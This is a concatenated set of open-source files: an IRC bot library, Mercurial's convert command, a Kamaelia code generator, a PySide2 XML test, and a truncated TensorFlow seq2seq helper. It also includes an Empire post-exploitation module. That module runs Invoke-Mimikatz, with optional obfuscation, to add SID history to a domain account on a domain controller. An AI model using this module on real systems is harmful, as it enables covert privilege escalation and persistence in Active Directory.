version = "%s.%s" % (version, VERSION[2])
if VERSION[3] != "f":
version = "%s%s%s" % (version, VERSION[3], VERSION[4])
if DEV_N:
version = "%s.dev%s" % (version, DEV_N)
return version
__version__ = get_version()
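# Worked example: with VERSION = (0, 2, 0, "a", 1) and DEV_N = 4 above,
# get_version() starts from "0.2", skips the falsy micro component, appends the
# "a1" pre-release tag (since VERSION[3] != "f"), then appends ".dev4", giving
# __version__ == "0.2a1.dev4".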
|
modulexcite/blink
|
refs/heads/nw12
|
Tools/Scripts/webkitpy/thirdparty/irc/ircbot.py
|
87
|
# Copyright (C) 1999--2002 Joel Rosdahl
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Joel Rosdahl <joel@rosdahl.net>
#
# $Id: ircbot.py,v 1.23 2008/09/11 07:38:30 keltus Exp $
"""ircbot -- Simple IRC bot library.
This module contains a single-server IRC bot class that can be used to
write simpler bots.
"""
import sys
from UserDict import UserDict
from irclib import SimpleIRCClient
from irclib import nm_to_n, irc_lower, all_events
from irclib import parse_channel_modes, is_channel
from irclib import ServerConnectionError
class SingleServerIRCBot(SimpleIRCClient):
"""A single-server IRC bot class.
The bot tries to reconnect if it is disconnected.
The bot keeps track of the channels it has joined, the other
clients that are present in the channels and which of those that
have operator or voice modes. The "database" is kept in the
self.channels attribute, which is an IRCDict of Channels.
"""
def __init__(self, server_list, nickname, realname, reconnection_interval=60):
"""Constructor for SingleServerIRCBot objects.
Arguments:
server_list -- A list of tuples (server, port) that
defines which servers the bot should try to
connect to.
nickname -- The bot's nickname.
realname -- The bot's realname.
reconnection_interval -- How long the bot should wait
before trying to reconnect.
dcc_connections -- A list of initiated/accepted DCC
connections.
"""
SimpleIRCClient.__init__(self)
self.channels = IRCDict()
self.server_list = server_list
if not reconnection_interval or reconnection_interval < 0:
reconnection_interval = 2**31
self.reconnection_interval = reconnection_interval
self._nickname = nickname
self._realname = realname
for i in ["disconnect", "join", "kick", "mode",
"namreply", "nick", "part", "quit"]:
self.connection.add_global_handler(i,
getattr(self, "_on_" + i),
-10)
def _connected_checker(self):
"""[Internal]"""
if not self.connection.is_connected():
self.connection.execute_delayed(self.reconnection_interval,
self._connected_checker)
self.jump_server()
def _connect(self):
"""[Internal]"""
password = None
if len(self.server_list[0]) > 2:
password = self.server_list[0][2]
try:
self.connect(self.server_list[0][0],
self.server_list[0][1],
self._nickname,
password,
ircname=self._realname)
except ServerConnectionError:
pass
def _on_disconnect(self, c, e):
"""[Internal]"""
self.channels = IRCDict()
self.connection.execute_delayed(self.reconnection_interval,
self._connected_checker)
def _on_join(self, c, e):
"""[Internal]"""
ch = e.target()
nick = nm_to_n(e.source())
if nick == c.get_nickname():
self.channels[ch] = Channel()
self.channels[ch].add_user(nick)
def _on_kick(self, c, e):
"""[Internal]"""
nick = e.arguments()[0]
channel = e.target()
if nick == c.get_nickname():
del self.channels[channel]
else:
self.channels[channel].remove_user(nick)
def _on_mode(self, c, e):
"""[Internal]"""
modes = parse_channel_modes(" ".join(e.arguments()))
t = e.target()
if is_channel(t):
ch = self.channels[t]
for mode in modes:
if mode[0] == "+":
f = ch.set_mode
else:
f = ch.clear_mode
f(mode[1], mode[2])
else:
# Mode on self... XXX
pass
def _on_namreply(self, c, e):
"""[Internal]"""
# e.arguments()[0] == "@" for secret channels,
# "*" for private channels,
# "=" for others (public channels)
# e.arguments()[1] == channel
# e.arguments()[2] == nick list
ch = e.arguments()[1]
for nick in e.arguments()[2].split():
if nick[0] == "@":
nick = nick[1:]
self.channels[ch].set_mode("o", nick)
elif nick[0] == "+":
nick = nick[1:]
self.channels[ch].set_mode("v", nick)
self.channels[ch].add_user(nick)
def _on_nick(self, c, e):
"""[Internal]"""
before = nm_to_n(e.source())
after = e.target()
for ch in self.channels.values():
if ch.has_user(before):
ch.change_nick(before, after)
def _on_part(self, c, e):
"""[Internal]"""
nick = nm_to_n(e.source())
channel = e.target()
if nick == c.get_nickname():
del self.channels[channel]
else:
self.channels[channel].remove_user(nick)
def _on_quit(self, c, e):
"""[Internal]"""
nick = nm_to_n(e.source())
for ch in self.channels.values():
if ch.has_user(nick):
ch.remove_user(nick)
def die(self, msg="Bye, cruel world!"):
"""Let the bot die.
Arguments:
msg -- Quit message.
"""
self.connection.disconnect(msg)
sys.exit(0)
def disconnect(self, msg="I'll be back!"):
"""Disconnect the bot.
The bot will try to reconnect after a while.
Arguments:
msg -- Quit message.
"""
self.connection.disconnect(msg)
def get_version(self):
"""Returns the bot version.
Used when answering a CTCP VERSION request.
"""
return "ircbot.py by Joel Rosdahl <joel@rosdahl.net>"
def jump_server(self, msg="Changing servers"):
"""Connect to a new server, possibly disconnecting from the current.
The bot will skip to next server in the server_list each time
jump_server is called.
"""
if self.connection.is_connected():
self.connection.disconnect(msg)
self.server_list.append(self.server_list.pop(0))
self._connect()
def on_ctcp(self, c, e):
"""Default handler for ctcp events.
Replies to VERSION and PING requests and relays DCC requests
to the on_dccchat method.
"""
if e.arguments()[0] == "VERSION":
c.ctcp_reply(nm_to_n(e.source()),
"VERSION " + self.get_version())
elif e.arguments()[0] == "PING":
if len(e.arguments()) > 1:
c.ctcp_reply(nm_to_n(e.source()),
"PING " + e.arguments()[1])
elif e.arguments()[0] == "DCC" and e.arguments()[1].split(" ", 1)[0] == "CHAT":
self.on_dccchat(c, e)
def on_dccchat(self, c, e):
pass
def start(self):
"""Start the bot."""
self._connect()
SimpleIRCClient.start(self)
class IRCDict:
"""A dictionary suitable for storing IRC-related things.
Dictionary keys a and b are considered equal if and only if
irc_lower(a) == irc_lower(b)
Otherwise, it should behave exactly as a normal dictionary.
"""
def __init__(self, dict=None):
self.data = {}
self.canon_keys = {} # Canonical keys
if dict is not None:
self.update(dict)
def __repr__(self):
return repr(self.data)
def __cmp__(self, dict):
if isinstance(dict, IRCDict):
return cmp(self.data, dict.data)
else:
return cmp(self.data, dict)
def __len__(self):
return len(self.data)
def __getitem__(self, key):
return self.data[self.canon_keys[irc_lower(key)]]
def __setitem__(self, key, item):
if key in self:
del self[key]
self.data[key] = item
self.canon_keys[irc_lower(key)] = key
def __delitem__(self, key):
ck = irc_lower(key)
del self.data[self.canon_keys[ck]]
del self.canon_keys[ck]
def __iter__(self):
return iter(self.data)
def __contains__(self, key):
return self.has_key(key)
def clear(self):
self.data.clear()
self.canon_keys.clear()
def copy(self):
if self.__class__ is UserDict:
return UserDict(self.data)
import copy
return copy.copy(self)
def keys(self):
return self.data.keys()
def items(self):
return self.data.items()
def values(self):
return self.data.values()
def has_key(self, key):
return irc_lower(key) in self.canon_keys
def update(self, dict):
for k, v in dict.items():
self.data[k] = v
def get(self, key, failobj=None):
return self.data.get(key, failobj)
class Channel:
"""A class for keeping information about an IRC channel.
This class can be improved a lot.
"""
def __init__(self):
self.userdict = IRCDict()
self.operdict = IRCDict()
self.voiceddict = IRCDict()
self.modes = {}
def users(self):
"""Returns an unsorted list of the channel's users."""
return self.userdict.keys()
def opers(self):
"""Returns an unsorted list of the channel's operators."""
return self.operdict.keys()
def voiced(self):
"""Returns an unsorted list of the persons that have voice
mode set in the channel."""
return self.voiceddict.keys()
def has_user(self, nick):
"""Check whether the channel has a user."""
return nick in self.userdict
def is_oper(self, nick):
"""Check whether a user has operator status in the channel."""
return nick in self.operdict
def is_voiced(self, nick):
"""Check whether a user has voice mode set in the channel."""
return nick in self.voiceddict
def add_user(self, nick):
self.userdict[nick] = 1
def remove_user(self, nick):
for d in self.userdict, self.operdict, self.voiceddict:
if nick in d:
del d[nick]
def change_nick(self, before, after):
self.userdict[after] = 1
del self.userdict[before]
if before in self.operdict:
self.operdict[after] = 1
del self.operdict[before]
if before in self.voiceddict:
self.voiceddict[after] = 1
del self.voiceddict[before]
def set_mode(self, mode, value=None):
"""Set mode on the channel.
Arguments:
mode -- The mode (a single-character string).
value -- Value
"""
if mode == "o":
self.operdict[value] = 1
elif mode == "v":
self.voiceddict[value] = 1
else:
self.modes[mode] = value
def clear_mode(self, mode, value=None):
"""Clear mode on the channel.
Arguments:
mode -- The mode (a single-character string).
value -- Value
"""
try:
if mode == "o":
del self.operdict[value]
elif mode == "v":
del self.voiceddict[value]
else:
del self.modes[mode]
except KeyError:
pass
def has_mode(self, mode):
return mode in self.modes
def is_moderated(self):
return self.has_mode("m")
def is_secret(self):
return self.has_mode("s")
def is_protected(self):
return self.has_mode("p")
def has_topic_lock(self):
return self.has_mode("t")
def is_invite_only(self):
return self.has_mode("i")
def has_allow_external_messages(self):
return self.has_mode("n")
def has_limit(self):
return self.has_mode("l")
def limit(self):
if self.has_limit():
return self.modes["l"]
else:
return None
def has_key(self):
return self.has_mode("k")
def key(self):
if self.has_key():
return self.modes["k"]
else:
return None
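# A minimal usage sketch of SingleServerIRCBot as described in its docstring;
# the server, channel and nickname are placeholders, and on_welcome/on_pubmsg
# are standard irclib event handlers:
#
#   class EchoBot(SingleServerIRCBot):
#       def on_welcome(self, c, e):
#           c.join("#example")
#       def on_pubmsg(self, c, e):
#           c.privmsg(e.target(), e.arguments()[0])
#
#   EchoBot([("irc.example.org", 6667)], "echobot", "Echo Bot").start()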
|
izonder/intellij-community
|
refs/heads/master
|
plugins/hg4idea/testData/bin/hgext/convert/convcmd.py
|
90
|
# convcmd - convert extension commands definition
#
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from common import NoRepo, MissingTool, SKIPREV, mapfile
from cvs import convert_cvs
from darcs import darcs_source
from git import convert_git
from hg import mercurial_source, mercurial_sink
from subversion import svn_source, svn_sink
from monotone import monotone_source
from gnuarch import gnuarch_source
from bzr import bzr_source
from p4 import p4_source
import filemap, common
import os, shutil
from mercurial import hg, util, encoding
from mercurial.i18n import _
orig_encoding = 'ascii'
def recode(s):
if isinstance(s, unicode):
return s.encode(orig_encoding, 'replace')
else:
return s.decode('utf-8').encode(orig_encoding, 'replace')
source_converters = [
('cvs', convert_cvs, 'branchsort'),
('git', convert_git, 'branchsort'),
('svn', svn_source, 'branchsort'),
('hg', mercurial_source, 'sourcesort'),
('darcs', darcs_source, 'branchsort'),
('mtn', monotone_source, 'branchsort'),
('gnuarch', gnuarch_source, 'branchsort'),
('bzr', bzr_source, 'branchsort'),
('p4', p4_source, 'branchsort'),
]
sink_converters = [
('hg', mercurial_sink),
('svn', svn_sink),
]
def convertsource(ui, path, type, rev):
exceptions = []
if type and type not in [s[0] for s in source_converters]:
raise util.Abort(_('%s: invalid source repository type') % type)
for name, source, sortmode in source_converters:
try:
if not type or name == type:
return source(ui, path, rev), sortmode
except (NoRepo, MissingTool), inst:
exceptions.append(inst)
if not ui.quiet:
for inst in exceptions:
ui.write("%s\n" % inst)
raise util.Abort(_('%s: missing or unsupported repository') % path)
def convertsink(ui, path, type):
if type and type not in [s[0] for s in sink_converters]:
raise util.Abort(_('%s: invalid destination repository type') % type)
for name, sink in sink_converters:
try:
if not type or name == type:
return sink(ui, path)
except NoRepo, inst:
ui.note(_("convert: %s\n") % inst)
except MissingTool, inst:
raise util.Abort('%s\n' % inst)
raise util.Abort(_('%s: unknown repository type') % path)
class progresssource(object):
def __init__(self, ui, source, filecount):
self.ui = ui
self.source = source
self.filecount = filecount
self.retrieved = 0
def getfile(self, file, rev):
self.retrieved += 1
self.ui.progress(_('getting files'), self.retrieved,
item=file, total=self.filecount)
return self.source.getfile(file, rev)
def lookuprev(self, rev):
return self.source.lookuprev(rev)
def close(self):
self.ui.progress(_('getting files'), None)
class converter(object):
def __init__(self, ui, source, dest, revmapfile, opts):
self.source = source
self.dest = dest
self.ui = ui
self.opts = opts
self.commitcache = {}
self.authors = {}
self.authorfile = None
# Record converted revisions persistently: maps source revision
# ID to target revision ID (both strings). (This is how
# incremental conversions work.)
self.map = mapfile(ui, revmapfile)
# Read first the dst author map if any
authorfile = self.dest.authorfile()
if authorfile and os.path.exists(authorfile):
self.readauthormap(authorfile)
# Extend/Override with new author map if necessary
if opts.get('authormap'):
self.readauthormap(opts.get('authormap'))
self.authorfile = self.dest.authorfile()
self.splicemap = common.parsesplicemap(opts.get('splicemap'))
self.branchmap = mapfile(ui, opts.get('branchmap'))
def walktree(self, heads):
'''Return a mapping that identifies the uncommitted parents of every
uncommitted changeset.'''
visit = heads
known = set()
parents = {}
while visit:
n = visit.pop(0)
if n in known or n in self.map:
continue
known.add(n)
self.ui.progress(_('scanning'), len(known), unit=_('revisions'))
commit = self.cachecommit(n)
parents[n] = []
for p in commit.parents:
parents[n].append(p)
visit.append(p)
self.ui.progress(_('scanning'), None)
return parents
def mergesplicemap(self, parents, splicemap):
"""A splicemap redefines child/parent relationships. Check the
map contains valid revision identifiers and merge the new
links in the source graph.
"""
for c in sorted(splicemap):
if c not in parents:
if not self.dest.hascommit(self.map.get(c, c)):
# Could be in source but not converted during this run
self.ui.warn(_('splice map revision %s is not being '
'converted, ignoring\n') % c)
continue
pc = []
for p in splicemap[c]:
# We do not have to wait for nodes already in dest.
if self.dest.hascommit(self.map.get(p, p)):
continue
# Parent is not in dest and not being converted, not good
if p not in parents:
raise util.Abort(_('unknown splice map parent: %s') % p)
pc.append(p)
parents[c] = pc
def toposort(self, parents, sortmode):
'''Return an ordering such that every uncommitted changeset is
preceded by all its uncommitted ancestors.'''
def mapchildren(parents):
"""Return a (children, roots) tuple where 'children' maps parent
revision identifiers to children ones, and 'roots' is the list of
revisions without parents. 'parents' must be a mapping of revision
identifier to its parents ones.
"""
visit = sorted(parents)
seen = set()
children = {}
roots = []
while visit:
n = visit.pop(0)
if n in seen:
continue
seen.add(n)
# Ensure that nodes without parents are present in the
# 'children' mapping.
children.setdefault(n, [])
hasparent = False
for p in parents[n]:
if p not in self.map:
visit.append(p)
hasparent = True
children.setdefault(p, []).append(n)
if not hasparent:
roots.append(n)
return children, roots
# Sort functions are supposed to take a list of revisions which
# can be converted immediately and pick one
def makebranchsorter():
"""If the previously converted revision has a child in the
eligible revisions list, pick it. Return the list head
otherwise. Branch sort attempts to minimize branch
switching, which is harmful for Mercurial backend
compression.
"""
prev = [None]
def picknext(nodes):
next = nodes[0]
for n in nodes:
if prev[0] in parents[n]:
next = n
break
prev[0] = next
return next
return picknext
def makesourcesorter():
"""Source specific sort."""
keyfn = lambda n: self.commitcache[n].sortkey
def picknext(nodes):
return sorted(nodes, key=keyfn)[0]
return picknext
def makeclosesorter():
"""Close order sort."""
keyfn = lambda n: ('close' not in self.commitcache[n].extra,
self.commitcache[n].sortkey)
def picknext(nodes):
return sorted(nodes, key=keyfn)[0]
return picknext
def makedatesorter():
"""Sort revisions by date."""
dates = {}
def getdate(n):
if n not in dates:
dates[n] = util.parsedate(self.commitcache[n].date)
return dates[n]
def picknext(nodes):
return min([(getdate(n), n) for n in nodes])[1]
return picknext
if sortmode == 'branchsort':
picknext = makebranchsorter()
elif sortmode == 'datesort':
picknext = makedatesorter()
elif sortmode == 'sourcesort':
picknext = makesourcesorter()
elif sortmode == 'closesort':
picknext = makeclosesorter()
else:
raise util.Abort(_('unknown sort mode: %s') % sortmode)
children, actives = mapchildren(parents)
s = []
pendings = {}
while actives:
n = picknext(actives)
actives.remove(n)
s.append(n)
# Update dependents list
for c in children.get(n, []):
if c not in pendings:
pendings[c] = [p for p in parents[c] if p not in self.map]
try:
pendings[c].remove(n)
except ValueError:
raise util.Abort(_('cycle detected between %s and %s')
% (recode(c), recode(n)))
if not pendings[c]:
# Parents are converted, node is eligible
actives.insert(0, c)
pendings[c] = None
if len(s) != len(parents):
raise util.Abort(_("not all revisions were sorted"))
return s
def writeauthormap(self):
authorfile = self.authorfile
if authorfile:
self.ui.status(_('writing author map file %s\n') % authorfile)
ofile = open(authorfile, 'w+')
for author in self.authors:
ofile.write("%s=%s\n" % (author, self.authors[author]))
ofile.close()
def readauthormap(self, authorfile):
afile = open(authorfile, 'r')
for line in afile:
line = line.strip()
if not line or line.startswith('#'):
continue
try:
srcauthor, dstauthor = line.split('=', 1)
except ValueError:
msg = _('ignoring bad line in author map file %s: %s\n')
self.ui.warn(msg % (authorfile, line.rstrip()))
continue
srcauthor = srcauthor.strip()
dstauthor = dstauthor.strip()
if self.authors.get(srcauthor) in (None, dstauthor):
msg = _('mapping author %s to %s\n')
self.ui.debug(msg % (srcauthor, dstauthor))
self.authors[srcauthor] = dstauthor
continue
m = _('overriding mapping for author %s, was %s, will be %s\n')
self.ui.status(m % (srcauthor, self.authors[srcauthor], dstauthor))
afile.close()
def cachecommit(self, rev):
commit = self.source.getcommit(rev)
commit.author = self.authors.get(commit.author, commit.author)
commit.branch = self.branchmap.get(commit.branch, commit.branch)
self.commitcache[rev] = commit
return commit
def copy(self, rev):
commit = self.commitcache[rev]
changes = self.source.getchanges(rev)
if isinstance(changes, basestring):
if changes == SKIPREV:
dest = SKIPREV
else:
dest = self.map[changes]
self.map[rev] = dest
return
files, copies = changes
pbranches = []
if commit.parents:
for prev in commit.parents:
if prev not in self.commitcache:
self.cachecommit(prev)
pbranches.append((self.map[prev],
self.commitcache[prev].branch))
self.dest.setbranch(commit.branch, pbranches)
try:
parents = self.splicemap[rev]
self.ui.status(_('spliced in %s as parents of %s\n') %
(parents, rev))
parents = [self.map.get(p, p) for p in parents]
except KeyError:
parents = [b[0] for b in pbranches]
source = progresssource(self.ui, self.source, len(files))
newnode = self.dest.putcommit(files, copies, parents, commit,
source, self.map)
source.close()
self.source.converted(rev, newnode)
self.map[rev] = newnode
def convert(self, sortmode):
try:
self.source.before()
self.dest.before()
self.source.setrevmap(self.map)
self.ui.status(_("scanning source...\n"))
heads = self.source.getheads()
parents = self.walktree(heads)
self.mergesplicemap(parents, self.splicemap)
self.ui.status(_("sorting...\n"))
t = self.toposort(parents, sortmode)
num = len(t)
c = None
self.ui.status(_("converting...\n"))
for i, c in enumerate(t):
num -= 1
desc = self.commitcache[c].desc
if "\n" in desc:
desc = desc.splitlines()[0]
# convert log message to local encoding without using
# tolocal() because the encoding.encoding convert()
# uses is 'utf-8'
self.ui.status("%d %s\n" % (num, recode(desc)))
self.ui.note(_("source: %s\n") % recode(c))
self.ui.progress(_('converting'), i, unit=_('revisions'),
total=len(t))
self.copy(c)
self.ui.progress(_('converting'), None)
tags = self.source.gettags()
ctags = {}
for k in tags:
v = tags[k]
if self.map.get(v, SKIPREV) != SKIPREV:
ctags[k] = self.map[v]
if c and ctags:
nrev, tagsparent = self.dest.puttags(ctags)
if nrev and tagsparent:
# write another hash correspondence to override the previous
# one so we don't end up with extra tag heads
tagsparents = [e for e in self.map.iteritems()
if e[1] == tagsparent]
if tagsparents:
self.map[tagsparents[0][0]] = nrev
bookmarks = self.source.getbookmarks()
cbookmarks = {}
for k in bookmarks:
v = bookmarks[k]
if self.map.get(v, SKIPREV) != SKIPREV:
cbookmarks[k] = self.map[v]
if c and cbookmarks:
self.dest.putbookmarks(cbookmarks)
self.writeauthormap()
finally:
self.cleanup()
def cleanup(self):
try:
self.dest.after()
finally:
self.source.after()
self.map.close()
def convert(ui, src, dest=None, revmapfile=None, **opts):
global orig_encoding
orig_encoding = encoding.encoding
encoding.encoding = 'UTF-8'
# support --authors as an alias for --authormap
if not opts.get('authormap'):
opts['authormap'] = opts.get('authors')
if not dest:
dest = hg.defaultdest(src) + "-hg"
ui.status(_("assuming destination %s\n") % dest)
destc = convertsink(ui, dest, opts.get('dest_type'))
try:
srcc, defaultsort = convertsource(ui, src, opts.get('source_type'),
opts.get('rev'))
except Exception:
for path in destc.created:
shutil.rmtree(path, True)
raise
sortmodes = ('branchsort', 'datesort', 'sourcesort', 'closesort')
sortmode = [m for m in sortmodes if opts.get(m)]
if len(sortmode) > 1:
raise util.Abort(_('more than one sort mode specified'))
sortmode = sortmode and sortmode[0] or defaultsort
if sortmode == 'sourcesort' and not srcc.hasnativeorder():
raise util.Abort(_('--sourcesort is not supported by this data source'))
if sortmode == 'closesort' and not srcc.hasnativeclose():
raise util.Abort(_('--closesort is not supported by this data source'))
fmap = opts.get('filemap')
if fmap:
srcc = filemap.filemap_source(ui, srcc, fmap)
destc.setfilemapmode(True)
if not revmapfile:
try:
revmapfile = destc.revmapfile()
except Exception:
revmapfile = os.path.join(destc, "map")
c = converter(ui, srcc, destc, revmapfile, opts)
c.convert(sortmode)
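# Illustrative invocation (not part of the original file), based on the options
# handled above: the destination defaults to "<source>-hg" when omitted, and at
# most one sort mode may be given.
#
#   hg convert --datesort --authormap authors.txt svn-repo converted-hg
#
# Flag spellings follow the opts keys used in convert() and may differ between
# Mercurial versions.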
|
sparkslabs/kamaelia
|
refs/heads/master
|
Sketches/TG/gui/ClassShard.py
|
15
|
# -*- coding: utf-8 -*-
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from Shard import *
import inspect
class classShard(docShard):
"""
Creates a class as a shard from given components.
Arguments:
    clsname = name of class as string; defaults to None, but a name must be
                        provided or shard initialisation will fail
superclasses = sequence of class names to inherit from. If empty
or unspecified, this will default to 'object'
docstring = formatted string of comments, default is empty
shards = list of shards (any of shard objects, lines of code, functions)
to form body of class, i.e. class variables and methods.
             Note: methods should be given as appropriate shard objects;
             for plain function objects, only the body of the function is imported
Returns:
shard object containing a definition of the class as specified
"""
# default initialisation parameters
initargs = {}
initargs['clsname'] = None
initargs['superclasses'] = []
initargs['docstring'] = ''
initargs['shards'] = []
# compulsory init parameters
required = ['clsname']
def __init__(self, clsname = None, superclasses = [], docstring = '', shards = []):
if not clsname:
raise ArgumentError, 'classname must be a non-empty string'
super(classShard, self).__init__(name = clsname, docstring = docstring,
shards = shards)
defline = self.makeclass(clsname, superclasses)
self.code = defline + self.addindent(self.docstring) + [nl] \
+ self.addindent(self.code, 1)
def makeclass(self, name, superclasses = None):
"""
Creates class statement
Arguments:
name = string of class name
superclasses = sequence of class names to inherit from. If empty
or unspecified, this will default to 'object'
Returns:
list of a single string that contains class statement
"""
str = "class " + name
if not superclasses:
return [str + "(object):"+ nl]
str += "(" + superclasses[0]
for supercls in superclasses[1:]:
str += ", " + supercls
return [str + "):" + nl]
def makeMethodShards(self, functions):
"""
Converts function objects to method shards, adds
self parameter if not present
Arguments:
functions = sequence of function or shard objects;
shards are added to output, functions
are converted to shard objects containing
code for the method
Returns:
list of shard objects corresponding to given functions
"""
mshards = []
for m in functions:
if isfunction(m):
lines = inspect.getsource(m).splitlines(True) # get code
# check for self parameter, add as necessary
if lines[0].find(m.func_name+"(self") == -1:
nm, br, argsln = lines[0].partition("(")
lines[0] = nm + br + "self, " + argsln
# make shard
m = shard(name = m.func_name, code = lines + [nl])
mshards += [m]
return mshards
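# Illustrative usage sketch (not part of the original module). Based on the
# docstring above, a class shard might be built from a name, superclasses and
# a list of body shards, e.g.
#
#   greeter = classShard(clsname = 'Greeter',
#                        superclasses = ['object'],
#                        docstring = 'Says hello.',
#                        shards = ['msg = "hello"' + nl])
#   print "".join(greeter.code)     # emits the generated class definition
#
# The exact forms accepted for 'shards' depend on the Shard base classes, so
# treat this as a sketch rather than a tested example.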
|
BadSingleton/pyside2
|
refs/heads/master
|
tests/QtXml/qdomdocument_test.py
|
3
|
#!/usr/bin/python
import unittest
from PySide2.QtCore import QByteArray
from PySide2.QtXml import QDomDocument, QDomElement
class QDomDocumentTest(unittest.TestCase):
def setUp(self):
self.dom = QDomDocument()
self.goodXmlData = QByteArray('''
<typesystem package="PySide2.QtXml">
<value-type name="QDomDocument"/>
<value-type name="QDomElement"/>
</typesystem>
''')
self.badXmlData = QByteArray('''
<typesystem package="PySide2.QtXml">
<value-type name="QDomDocument">
</typesystem>
''')
def tearDown(self):
del self.dom
del self.goodXmlData
del self.badXmlData
def testQDomDocumentSetContentWithBadXmlData(self):
'''Sets invalid xml as the QDomDocument contents.'''
ok, errorStr, errorLine, errorColumn = self.dom.setContent(self.badXmlData, True)
self.assertFalse(ok)
self.assertEqual(errorStr, 'tag mismatch')
self.assertEqual(errorLine, 4)
self.assertEqual(errorColumn, 21)
def testQDomDocumentSetContentWithGoodXmlData(self):
'''Sets valid xml as the QDomDocument contents.'''
ok, errorStr, errorLine, errorColumn = self.dom.setContent(self.goodXmlData, True)
self.assert_(ok)
self.assertEqual(errorStr, '')
self.assertEqual(errorLine, 0)
self.assertEqual(errorColumn, 0)
def testQDomDocumentData(self):
'''Checks the QDomDocument elements for the valid xml contents.'''
def checkAttribute(element, attribute, value):
            self.assert_(isinstance(element, QDomElement))
self.assertFalse(element.isNull())
self.assert_(element.hasAttribute(attribute))
self.assertEqual(element.attribute(attribute), value)
ok, errorStr, errorLine, errorColumn = self.dom.setContent(self.goodXmlData, True)
root = self.dom.documentElement()
self.assertEqual(root.tagName(), 'typesystem')
checkAttribute(root, 'package', 'PySide2.QtXml')
child = root.firstChildElement('value-type')
checkAttribute(child, 'name', 'QDomDocument')
child = child.nextSiblingElement('value-type')
checkAttribute(child, 'name', 'QDomElement')
if __name__ == '__main__':
unittest.main()
|
bkirui/odoo
|
refs/heads/8.0
|
addons/google_calendar/controllers/__init__.py
|
7372
|
import main
|
PowerShellEmpire/Empire
|
refs/heads/master
|
lib/modules/powershell/persistence/misc/add_sid_history.py
|
10
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Mimikatz Add-SIDHistory',
'Author': ['@JosephBialek', '@gentilkiwi'],
'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
"to execute misc::addsid to add sid history for a user. "
"ONLY APPLICABLE ON DOMAIN CONTROLLERS!"),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : False,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'http://clymb3r.wordpress.com/',
'http://blog.gentilkiwi.com'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'User' : {
'Description' : 'User to add sidhistory for.',
'Required' : True,
'Value' : ''
},
'Groups' : {
'Description' : 'Groups/users to add to the sidhistory of the target user (COMMA-separated).',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# ridiculous escape format
groups = " ".join(['"\\""'+group.strip().strip("'\"")+'"""' for group in self.options["Groups"]['Value'].split(",")])
# build the custom command with whatever options we want
command = '""misc::addsid '+self.options["User"]['Value'] + ' ' + groups
# base64 encode the command to pass to Invoke-Mimikatz
scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
|
ageron/tensorflow
|
refs/heads/master
|
tensorflow/contrib/seq2seq/python/ops/helper.py
|
11
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A library of helpers for use with SamplingDecoders.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
from tensorflow.contrib.seq2seq.python.ops import decoder
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.util import nest
__all__ = [
"Helper",
"TrainingHelper",
"GreedyEmbeddingHelper",
"SampleEmbeddingHelper",
"CustomHelper",
"ScheduledEmbeddingTrainingHelper",
"ScheduledOutputTrainingHelper",
"InferenceHelper",
]
_transpose_batch_time = decoder._transpose_batch_time # pylint: disable=protected-access
# The following sample functions (_call_sampler, bernoulli_sample,
